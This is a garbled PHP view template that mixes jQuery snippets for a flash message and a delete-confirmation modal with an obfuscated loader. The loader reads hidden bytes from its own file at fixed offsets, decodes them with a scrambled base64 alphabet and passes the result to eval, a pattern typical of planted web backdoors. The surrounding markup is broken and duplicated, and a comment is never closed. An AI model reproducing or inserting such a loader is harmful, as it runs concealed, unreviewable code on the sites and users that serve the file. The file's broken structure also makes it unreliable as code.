<?php
/**
*
});
</script>
 <script>
$('#confirm-delete').on('show.bs.modal', function(e) {
    $(this).find('.btn-ok').attr('href', $(e.relatedTarget).data('href'));
});
    </script>
$O000O0O00=$GLOBALS['OOO000O00']($OOO0O0O00,'rb');$GLOBALS['O0O00OO00']($O000O0O00,0x533);$OO00O00O0=$GLOBALS['OOO0000O0']($GLOBALS['OOO00000O']($GLOBALS['O0O00OO00']($O000O0O00,0x1a8),'fHbj+EoK6tu485O7Wzq9J/3nVSLYglUMixRPkFQTNsX2GAyrevZ1pIamhCd0cDBw=','ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'));eval($OO00O00O0);$OO00O00O0=str_replace('__FILE__',"'".$OOO0O0O00."'",$GLOBALS['OOO0000O0']($GLOBALS['OOO00000O']($GLOBALS['O0O00OO00']($O000O0O00,$OO00O0000),'fHbj+EoK6tu485O7Wzq9J/3nVSLYglUMixRPkFQTNsX2GAyrevZ1pIamhCd0cDBw=','ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/')));fclose($O000O0O00);eval($OO00O00O0);
echo ' <script> '."
";
echo '$(document).ready(function () {'."
";
echo '    $(\'#flash-msg\').delay(3000).fadeOut(\'slow\');'."
";
echo '});'."
";
echo '  </script>'."
";
echo ' <script>'."
";
echo '$(\'#confirm-delete\').on(\'show.bs.modal\', function(e) {'."
";
echo '    $(this).find(\'.btn-ok\').attr(\'href\', $(e.relatedTarget).data(\'href\'));'."
";
echo '});'."
";
echo '    </script>'."
";